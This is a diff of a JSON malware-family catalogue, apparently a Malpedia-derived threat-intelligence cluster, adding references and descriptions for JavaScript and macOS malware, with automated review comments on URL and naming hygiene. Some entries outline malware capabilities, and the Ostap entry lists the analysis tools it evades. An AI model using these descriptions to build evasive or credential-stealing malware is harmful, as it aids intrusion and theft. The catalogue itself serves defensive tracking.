+ "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/"
 ],
 "synonyms": [],
 "type": []
@@ -2392,12 +4858,33 @@
 "uuid": "b7deec7e-24f7-4f78-9d58-9b3c1e182ab3",
 "value": "EVILNUM (Javascript)"
 },
+ {
+ "description": "grelos is a skimmer used for magecart-style attacks.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/js.grelos",
+ "https://gist.github.com/krautface/2c017f220f2a24141bdeb70f76e7e745",
+ "https://www.riskiq.com/blog/labs/magecart-medialand/",
+ "https://community.riskiq.com/article/8c4b4a7a"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "79580c0b-c390-4421-976a-629a5c11af95",
+ "value": "grelos"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/js.griffon",
- "https://twitter.com/ItsReallyNick/status/1059898708286939136"
+ "https://twitter.com/ItsReallyNick/status/1059898708286939136",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/would-you-exchange-your-security-for-a-gift-card/",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
+ "https://www.secureworks.com/research/threat-profiles/gold-niagara",
+ "https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/",
+ "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout"
 ],
 "synonyms": [],
 "type": []
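Review bot: The CrowdStrike reference added to the Griffon entry keeps a marketing tracking query string (`?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout`), so the stored URL is not canonical and will not de-duplicate against the same article recorded without it. The labs.bitdefender.com reference added to the ostap entry in the hunk `@@ -2473,6 +5056,39 @@` carries the same kind of `utm_*` suffix. Since the commit message says the cluster is pulled from the Malpedia API, these parameters are presumably inherited from upstream, so the cleanest place to strip `utm_*` query parameters is the import step; the Griffon line would then read `"https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/"`.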
@@ -2405,11 +4892,38 @@
 "uuid": "85c25380-69d7-4d7e-b279-6b6791fd40bd",
 "value": "Griffon"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/js.inter",
+ "https://www.fortinet.com/blog/threat-research/inter-skimmer-for-all.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "36b0f1a0-29a4-4ec5-bca2-18a241881d49",
+ "value": "inter"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/js.jsprat",
+ "https://www.secureworks.com/research/analysis-of-dhs-nccic-indicators"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "71903afc-7129-4821-90e5-c490e4902de3",
+ "value": "jspRAT"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/js.kopiluwak",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
 "https://www.proofpoint.com/us/threat-insight/post/turla-apt-actor-refreshes-kopiluwak-javascript-backdoor-use-g20-themed-attack",
 "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/",
 "https://securelist.com/blog/research/77429/kopiluwak-a-new-javascript-payload-from-turla/"
@@ -2422,12 +4936,67 @@ }, { "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.lnkr", + "https://github.com/Zenexer/lnkr", + "https://github.com/Zenexer/lnkr/blob/master/recon/extensions/fanagokoaogopceablgmpndejhedkjjb/README.md", + "https://www.riskiq.com/blog/labs/lnkr-browser-extension/", + "https://krebsonsecurity.com/2020/03/the-case-for-limiting-your-browser-extensions/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "1a85acf3-4bda-49b4-9e50-1231f0b7340a", + "value": "LNKR" + }, + { + "description": "Magecart is a malware framework intended to steal credit card information from compromised eCommerce websites. Used in criminal activities, it's a sophisticated implant built on top of relays, command and controls and anonymizers used to steal eCommerce customers' credit card information. The first stage is typically implemented in Javascript included into a compromised checkout page. It copies data from \"input fields\" and send them to a relay which collects credit cards coming from a subset of compromised eCommerces and forwards them to Command and Control servers.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.magecart", + "https://sansec.io/research/magento-2-persistent-parasite", + "https://geminiadvisory.io/wp-content/uploads/2020/07/Appendix-C-1.pdf", + "https://sansec.io/research/north-korea-magecart", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf", + "https://www.riskiq.com/blog/labs/magecart-medialand/", + "https://maxkersten.nl/2020/02/17/following-the-tracks-of-magecart-12/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/mirrorthief-group-uses-magecart-skimming-attack-to-hit-hundreds-of-campus-online-stores-in-us-and-canada/", + "https://www.riskiq.com/blog/labs/magecart-nutribullet/", + 
"https://community.riskiq.com/article/fda1f967", "https://www.riskiq.com/blog/labs/magecart-group-4-always-advancing/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/us-local-government-services-targeted-by-new-magecart-credit-card-skimming-attack/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/fin6-compromised-e-commerce-platform-via-magecart-to-inject-credit-card-skimmers-into-thousands-of-online-shops/", + "https://sansec.io/labs/2020/01/25/magecart-hackers-arrested/", + "https://www.reflectiz.com/ico-fines-ticketmaster-uk-1-25-million-for-security-failures-a-lesson-to-be-learned/", + "https://www.goggleheadedhacker.com/blog/post/14", + "https://www.riskiq.com/blog/labs/magecart-group-12-olympics/", + "https://geminiadvisory.io/keeper-magecart-group-infects-570-sites/", + "https://community.riskiq.com/article/5bea32aa", + "https://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/", + "https://www.crowdstrike.com/blog/threat-actor-magecart-coming-to-an-ecommerce-store-near-you/", + "https://blog.malwarebytes.com/cybercrime/2019/04/github-hosted-magecart-skimmer-used-against-hundreds-of-e-commerce-sites/", + "https://marcoramilli.com/2020/02/19/uncovering-new-magecart-implant-attacking-ecommerce/", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/injecting-magecart-into-magento-global-config/", + "https://www.perimeterx.com/blog/analyzing_magecart_malware_from_zero_to_hero/", + "https://www.zdnet.com/article/web-skimmers-found-on-the-websites-of-intersport-claires-and-icing/", + "https://community.riskiq.com/article/30f22a00", + "https://securelist.com/apt-trends-report-q2-2019/91897/", + "https://community.riskiq.com/article/14924d61", + "https://blog.sucuri.net/2020/06/evasion-tactics-in-hybrid-credit-card-skimmers.html", + "https://maxkersten.nl/2020/01/20/ticket-resellers-infected-with-a-credit-card-skimmer/", + 
"https://medium.com/reflectiz/csp-the-right-solution-for-the-web-skimming-pandemic-acb7a4414218", + "https://sansec.io/research/magecart-corona-lockdown", "https://www.riskiq.com/blog/labs/magecart-ticketmaster-breach/", - "https://www.crowdstrike.com/blog/threat-actor-magecart-coming-to-an-ecommerce-store-near-you/" + "https://blog.trendmicro.com/trendlabs-security-intelligence/magecart-skimming-attack-targets-mobile-users-of-hotel-chain-booking-websites/", + "https://blog.malwarebytes.com/threat-analysis/2020/06/web-skimmer-hides-within-exif-metadata-exfiltrates-credit-cards-via-image-files/", + "https://blog.sucuri.net/2020/11/css-js-steganography-in-fake-flash-player-update-malware.html", + "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf", + "https://www.riskiq.com/blog/labs/misconfigured-s3-buckets/", + "https://maxkersten.nl/2020/02/24/closing-in-on-magecart-12/", + "https://blog.sucuri.net/2020/07/skimmers-in-images-github-repos.html", + "https://www.reflectiz.com/the-gocgle-web-skimming-campaign/" ], "synonyms": [], "type": [] 
@@ -2440,16 +5009,30 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.more_eggs", + "https://attack.mitre.org/software/S0284/", + "https://github.com/eset/malware-ioc/tree/master/evilnum", + "https://mp.weixin.qq.com/s/REXBtbnI2zXj4H3u6ofMMw", "https://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses/", + "https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/", "https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/", - "https://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fish", + "https://www.secureworks.com/research/threat-profiles/gold-kingswood", + "http://www.secureworks.com/research/threat-profiles/gold-kingswood", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://blog.trendmicro.com/trendlabs-security-intelligence/cobalt-spam-runs-use-macros-cve-2017-8759-exploit/", - "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html", "https://www.proofpoint.com/us/threat-insight/post/fake-jobs-campaigns-delivering-moreeggs-backdoor-fake-job-offers", + "https://twitter.com/Arkbird_SOLG/status/1301536930069278727", + "https://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fish", + "https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf", + "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html", + "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/", + "https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/", 
"https://asert.arbornetworks.com/double-the-infection-double-the-fun/", + "https://securityintelligence.com/posts/more_eggs-anyone-threat-actor-itg08-strikes-again/", "https://blog.morphisec.com/cobalt-gang-2.0" ], "synonyms": [ + "SKID", "SpicyOmelette" ], "type": [] 
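Review bot: The more_eggs refs now list the same SecureWorks profile twice, once as `"https://www.secureworks.com/research/threat-profiles/gold-kingswood"` and once as `"http://www.secureworks.com/research/threat-profiles/gold-kingswood"`, differing only in scheme. One of the two should go, and keeping the https form avoids pointing readers at a plaintext URL. If the generator de-duplicates refs it evidently compares full strings, so normalising the scheme before comparison would prevent this class of duplicate across the whole cluster. The enclosing more_eggs object starts before this hunk.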
@@ -2473,6 +5056,39 @@ "uuid": "3e46af39-52e8-442f-aff1-38eeb90336fc", "value": "NanHaiShu" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.node_rat", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf", + "https://www.virusbulletin.com/virusbulletin/2020/05/vb2019-paper-apt-cases-exploiting-vulnerabilities-regionspecific-software/", + "https://blogs.jpcert.or.jp/ja/2019/02/tick-activity.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "e3b0ed5c-4e6a-4f50-bef2-1f7112aa31ed", + "value": "NodeRAT" + }, + { + "description": "Ostap is a commodity JScript downloader first seen in campaigns in 2016. It has been observed being delivered in ACE archives and VBA macro-enabled Microsoft Office documents. Recent versions of Ostap query WMI to check for a blacklist of running processes:\r\n\r\nAgentSimulator.exe\r\nanti-virus.EXE\r\nBehaviorDumper\r\nBennyDB.exe\r\nctfmon.exe\r\nfakepos_bin\r\nFrzState2k\r\ngemu-ga.exe (Possible misspelling of Qemu hypervisor\u2019s guest agent, qemu-ga.exe)\r\nImmunityDebugger.exe\r\nKMS Server Service.exe\r\nProcessHacker\r\nprocexp\r\nProxifier.exe\r\npython\r\ntcpdump\r\nVBoxService\r\nVBoxTray.exe\r\nVmRemoteGuest\r\nvmtoolsd\r\nVMware2B.exe\r\nVzService.exe\r\nwinace\r\nWireshark\r\n\r\nIf a blacklisted process is found, the malware terminates.\r\n\r\nOstap has been observed delivering other malware families, including Nymaim, Backswap and TrickBot.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.ostap", + "https://www.bromium.com/deobfuscating-ostap-trickbots-javascript-downloader/", + "https://www.intrinsec.com/deobfuscating-hunting-ostap/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/latest-trickbot-campaign-delivered-via-highly-obfuscated-js-file/", + 
"https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter", + "https://www.cert.pl/en/news/single/ostap-malware-analysis-backswap-dropper/", + "https://github.com/cryptogramfan/Malware-Analysis-Scripts/blob/master/deobfuscate_ostap.py" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a3b93781-c51c-4ccb-a856-804331470a9d", + "value": "ostap" + }, { "description": "", "meta": { 
@@ -2486,13 +5102,44 @@ "uuid": "9521ceb0-039d-412c-a38b-7bd9ddfc772e", "value": "Powmet" }, + { + "description": "According to Trend Micro, this is a Node.js based malware, that can download/upload/execute files, steal credentials from Chrome/Firefox browsers, and perform file management, among other things. It targets Windows and has components for both 32 and 64bit.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.qnodeservice", + "https://blog.trendmicro.com/trendlabs-security-intelligence/qnodeservice-node-js-trojan-spread-via-covid-19-lure/", + "https://www.telsy.com/wp-content/uploads/MAR_93433_WHITE.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "52d9260f-f090-4e79-b0b3-0c89f5db6bc6", + "value": "QNodeService" + }, + { + "description": "QUICKCAFE is an encrypted JavaScript downloader for QUICKRIDE.POWER that exploits the ActiveX M2Soft vulnerabilities. QUICKCAFE is obfuscated using JavaScript Obfuscator.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.quickcafe", + "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "475766d2-1e99-4d81-89e4-0d0df4a562d0", + "value": "QUICKCAFE" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.scanbox", + "https://www.secureworks.com/research/threat-profiles/bronze-mohawk", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/attacker-tracking-users-seeking-pakistani-passport/", + "https://www.proofpoint.com/us/blog/threat-insight/ta413-leverages-new-friarfox-browser-extension-target-gmail-accounts-global", "https://www.alienvault.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks", - "http://resources.infosecinstitute.com/scanbox-framework/" + "http://resources.infosecinstitute.com/scanbox-framework/", + 
"https://www.volexity.com/blog/2019/09/02/digital-crackdown-large-scale-surveillance-and-exploitation-of-uyghurs/" ], "synonyms": [], "type": [] @@ -2505,7 +5152,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.sqlrat", - "https://www.flashpoint-intel.com/blog/fin7-revisited-inside-astra-panel-and-sqlrat-malware/" + "https://www.flashpoint-intel.com/blog/fin7-revisited-inside-astra-panel-and-sqlrat-malware/", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf" ], "synonyms": [], "type": [] @@ -2513,11 +5161,25 @@ "uuid": "d51cb8f8-cca3-46ce-a05d-052df44aef40", "value": "SQLRat" }, + { + "description": "According to the author, this is a JavaScript based Empire launcher that runs with its own embedded powershell host to not be dependent on local powershell availability.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.starfighter", + "https://github.com/Cn33liz/StarFighters" + ], + "synonyms": [], + "type": [] + }, + "uuid": "f6c80748-1cce-4f6b-92e9-f8a04ff3464a", + "value": "Starfighter (Javascript)" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.turla_ff_ext", + "https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/", "https://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/" ], "synonyms": [], @@ -2543,7 +5205,7 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/js.unidentified_050", + "https://malpedia.caad.fkie.fraunhofer.de/details/js.unidentified_001", "https://community.riskiq.com/projects/53b4bd1e-dad0-306b-7712-d2a608400c8f", "https://gist.github.com/9b/141a5c7ab8b4280901722e2cd931b7ef" ], 
@@ -2551,7 +5213,66 @@ "type": [] }, "uuid": "f2b0ffdc-7d4e-4786-8935-e7036faa174d", - "value": "Unidentified 050 (APT32 Profiler)" + "value": "Unidentified JS 001 (APT32 Profiler)" + }, + { + "description": "According to Max Kersten, Emotet is dropped by a procedure spanned over multiple stages. The first stage is an office file that contains a macro. This macro then loads the second stage, which is either a PowerShell script or a piece of JavaScript, which is this family entry.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.unidentified_003", + "https://maxkersten.nl/binary-analysis-course/malware-analysis/emotet-javascript-downloader/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "7bf28be0-3153-474d-8df7-e12fec511d7e", + "value": "Unidentified JS 003 (Emotet Downloader)" + }, + { + "description": "A simple loader written in JavaScript found by Marco Ramilli.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.unidentified_004", + "https://marcoramilli.com/2020/11/27/threat-actor-unkown/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a15e7c49-4eb6-46f0-8f79-0b765d7d4e46", + "value": "Unidentified JS 004" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.unidentified_js_002" + ], + "synonyms": [], + "type": [] + }, + "uuid": "7144063f-966b-4277-b316-00eb970ccd52", + "value": "Unidentified JS 002" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.valak", + "https://medium.com/@prsecurity_/casual-analysis-of-valak-c2-3497fdb79bf7", + "https://twitter.com/malware_traffic/status/1207824548021886977", + "https://security-soup.net/analysis-of-valak-maldoc/", + "https://www.cybereason.com/blog/valak-more-than-meets-the-eye", + "https://labs.sentinelone.com/valak-malware-and-the-connection-to-gozi-loader-confcrew/", + "https://unit42.paloaltonetworks.com/valak-evolution/", + 
"https://blog.talosintelligence.com/2020/07/valak-emerges.html" + ], + "synonyms": [ + "Valek" + ], + "type": [] + }, + "uuid": "b37b4d91-0ac7-48f5-8fd1-5237b9615cf7", + "value": "Valak" }, { "description": "", 
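Review bot: Renaming `value` from `"Unidentified 050 (APT32 Profiler)"` to `"Unidentified JS 001 (APT32 Profiler)"` while keeping the uuid is the right way to preserve the entry's identity, but anything that matches on the old display name will silently stop matching; adding the old name to `synonyms` would keep those lookups working, and the `"AppleJeus"` → `"AppleJeus (OS X)"` rename in the hunk `@@ -2571,19 +5292,37 @@` has the same issue. Separately, the new entry's Malpedia ref `js.unidentified_js_002` does not follow the `js.unidentified_00N` slug pattern of its neighbours (`js.unidentified_001`, `_003`, `_004`); if that is not the actual upstream slug the link resolves to nothing, so it is worth checking against the API output. The hunk starts with a change to a `value` line whose enclosing object begins before it.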
@@ -2571,19 +5292,37 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/osx.applejeus",
- "https://securelist.com/operation-applejeus/87553/"
+ "https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048e",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048g",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048c",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048b",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048a",
+ "https://objective-see.com/blog/blog_0x54.html",
+ "https://securelist.com/apt-trends-report-q2-2020/97937/",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048f",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://securelist.com/operation-applejeus-sequel/95596/",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048d",
+ "https://securelist.com/operation-applejeus/87553/",
+ "https://objective-see.com/blog/blog_0x5F.html",
+ "https://posts.specterops.io/introducing-venator-a-macos-tool-for-proactive-detection-34055a017e56",
+ "https://us-cert.cisa.gov/ncas/alerts/aa21-048a",
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
+ "https://objective-see.com/blog/blog_0x49.html"
 ],
 "synonyms": [],
 "type": []
 },
 "uuid": "ca466f15-8e0a-4030-82cb-5382e3c56ee5",
- "value": "AppleJeus"
+ "value": "AppleJeus (OS X)"
 },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/osx.bella",
+ "https://threatintel.blog/OPBlueRaven-Part2/",
 "https://github.com/kai5263499/Bella",
 "https://blog.malwarebytes.com/threat-analysis/2017/05/another-osx-dok-dropper-found-installing-new-backdoor/"
 ],
@@ -2593,6 +5332,23 @@
 "uuid": "3c5036ad-2afc-4bc1-a5a3-b31797f46248",
 "value": "Bella"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.bundlore",
+ "https://blog.confiant.com/new-macos-bundlore-loader-analysis-ca16d19c058c",
+ "https://labs.sentinelone.com/resourceful-macos-malware-hides-in-named-fork/",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf"
+ ],
+ "synonyms": [
+ "SurfBuyer"
+ ],
+ "type": []
+ },
+ "uuid": "5f5f5496-d9f8-4984-aa66-8702741646fe",
+ "value": "Bundlore"
+ },
 {
 "description": "",
 "meta": {
@@ -2611,10 +5367,24 @@ }, { "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.casso", + "https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "387e1a19-458d-4961-a8e4-3f82463085e5", + "value": "Casso" + }, + { + "description": "CoinThief was a malware package designed to steal Bitcoins from the victim, consisting of a binary patcher, browser extensions, and a backdoor component. \r\n\r\nIt was spreading in early 2014 from several different sources: \r\n- on Github (where the trojanized compiled binary didn\u2019t match the displayed source code), o\r\n- on popular and trusted download sites line CNET's Download.com or MacUpdate.com, and \r\n- as cracked applications via torrents camouflaged as Bitcoin Ticker TTM, BitVanity, StealthBit, Litecoin Ticker, BBEdit, Pixelmator, Angry Birds and Delicious Library.\r\n\r\nThe patcher\u2018s role was to locate and modify legitimate versions of the Bitcoin-Qt wallet application. The analyzed malware samples targeted versions of Bitcoin-Qt 0.8.1, 0.8.0 and 0.8.5. The earlier patch modified Bitcoin-Qt adding malicious code that would send nearly all the victim\u2019s Bitcoins to one of the hard-coded addresses belonging to the attacker. \r\n\r\nThe browser extensions targeted Chrome and Firefox and are disguised as a \u201cPop-up blocker\u201d. The extensions monitored visited websites, download malicious JavaScripts and injected them into various Bitcoin-related websites (mostly Bitcoin exchanges and online wallet sites). 
The injected JS scripts were able to modify transactions to redirect Bitcoin transfers to an attacker\u2019s address or simply harvest login credentials to the targeted online service.\r\n\r\nThe backdoor enabled the attacker to take full control over the victim\u2019s computer:\r\n- collect information about the infected computer\r\n- execute arbitrary shell scripts on the target computer\r\n- upload an arbitrary file from the victim\u2019s hard drive to a remote server\r\n- update itself to a newer version", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.cointhief", - "https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed" + "https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed", + "https://reverse.put.as/2014/02/16/analysis-of-cointhiefa-dropper/" ], "synonyms": [], "type": [] @@ -2627,6 +5397,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.coldroot_rat", + "https://objectivebythesea.com/v2/talks/OBTS_v2_Seele.pdf", "https://objective-see.com/blog/blog_0x2A.html" ], "synonyms": [], @@ -2676,7 +5447,7 @@ "type": [] }, "uuid": "2bb6c494-8057-4d83-9202-fda3284deee4", - "value": "Crisis (OS X)" + "value": "Crisis" }, { "description": "", 
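Review bot: In the last hunk on this line the new `"value": "Crisis"` drops the platform suffix that every other macOS entry in this diff keeps (`Dacls (OS X)`, `FinFisher (OS X)`, `Tsunami (OS X)`, `X-Agent (OS X)`), and if the cluster also carries a Windows `Crisis` entry the two values now collide. Values double as tag strings, so two entries sharing one value cannot be told apart on an event; the repository's duplicate-value check, if it runs in CI, should catch this, but it is worth grepping the rest of the file for a second `"value": "Crisis"` before merging. If upstream insists on the short name, note it in the commit description so the ambiguity is at least visible to consumers.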
@@ -2691,6 +5462,28 @@
 "uuid": "05ddb459-5a2f-44d5-a135-ed3f1e772302",
 "value": "Crossrider"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.dacls",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-dacls-rat-backdoor-show-lazarus-multi-platform-attack-capability",
+ "https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/",
+ "https://securelist.com/mata-multi-platform-targeted-malware-framework/97746/",
+ "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/",
+ "https://www.sygnia.co/mata-framework",
+ "https://securelist.com/apt-trends-report-q2-2020/97937/",
+ "https://objective-see.com/blog/blog_0x5F.html",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-dacls-rat-backdoor-show-lazarus-multi-platform-attack-capability/",
+ "https://objective-see.com/blog/blog_0x57.html",
+ "https://blog.malwarebytes.com/threat-analysis/2020/05/new-mac-variant-of-lazarus-dacls-rat-distributed-via-trojanized-2fa-app/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "81def650-f52e-49a3-a3fe-cb53ffa75d67",
+ "value": "Dacls (OS X)"
+ },
 {
 "description": "",
 "meta": {
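Review bot: The Dacls `refs` array lists the same Trend Micro article twice, once without and once with a trailing slash (`…new-macos-dacls-rat-backdoor-show-lazarus-multi-platform-attack-capability` and `…capability/`). The references appear to be passed through from the Malpedia export unchanged, so a small normalization step in the import (strip a trailing `/`, then drop duplicates while keeping order) would keep this and similar near-duplicates out of the cluster without waiting for an upstream fix.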
@@ -2732,7 +5525,7 @@ "value": "Dummy" }, { - "description": "", + "description": "Eleanor comes as a drag-and-drop file utility called EasyDoc Converter. This application bundle wraps a shell script that uses Dropbox name as a disguise and installs three components: a hidden Tor service, a Pastebin agent and a web service with a PHP-based graphical interface.\r\n\r\nThe Tor service transforms the victim\u2019s computer into a server that provides attackers with full anonymous access to the infected machine via Tor-generated address. \r\n\r\nThe Pastebin agent uploads the address in encrypted form to the Pastebin website where the attackers can obtain it.\r\n\r\nThe web service is the main malicious component that provides the attackers with the control over the infected machine. After successful authentication, the interface offers several control panels to the attackers, allowing them to do the following actions:\r\n\r\n- Managing files\r\n- Listing processes\r\n- Connecting to various database management systems such as MySQL or SQLite\r\n- Connecting via bind/reverse shell\r\n- Executing shell command\r\n- Capturing and browsing images and videos from the victim\u2019s webcam\r\n- Sending emails with an attachment", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.eleanor", @@ -2744,6 +5537,20 @@ "uuid": "c221e519-fe3e-416e-bc63-a2246b860958", "value": "Eleanor" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.electro_rat", + "https://www.intezer.com/blog/research/operation-electrorat-attacker-creates-fake-companies-to-drain-your-crypto-wallets/", + "https://objective-see.com/blog/blog_0x61.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "f8ccf928-7d4f-4999-91a5-9222f148152d", + "value": "ElectroRAT" + }, { "description": "", "meta": { 
@@ -2758,6 +5565,26 @@
 "uuid": "24f3d8e1-3936-4664-b813-74c797b87d9d",
 "value": "EvilOSX"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.evilquest",
+ "https://github.com/gdbinit/evilquest_deobfuscator",
+ "https://labs.sentinelone.com/breaking-evilquest-reversing-a-custom-macos-ransomware-file-encryption-routine/",
+ "https://objective-see.com/blog/blog_0x59.html",
+ "https://objective-see.com/blog/blog_0x5F.html",
+ "https://www.bleepingcomputer.com/news/security/evilquest-wiper-uses-ransomware-cover-to-steal-files-from-macs/",
+ "https://twitter.com/dineshdina04/status/1277668001538433025"
+ ],
+ "synonyms": [
+ "ThiefQuest"
+ ],
+ "type": []
+ },
+ "uuid": "d5b39223-a8cc-4d47-8030-1d7d6312d351",
+ "value": "EvilQuest"
+ },
 {
 "description": "",
 "meta": {
@@ -2771,6 +5598,23 @@
 "uuid": "5dfd704c-a69d-4e93-bd70-68f89fbbb32c",
 "value": "FailyTale"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.finfisher",
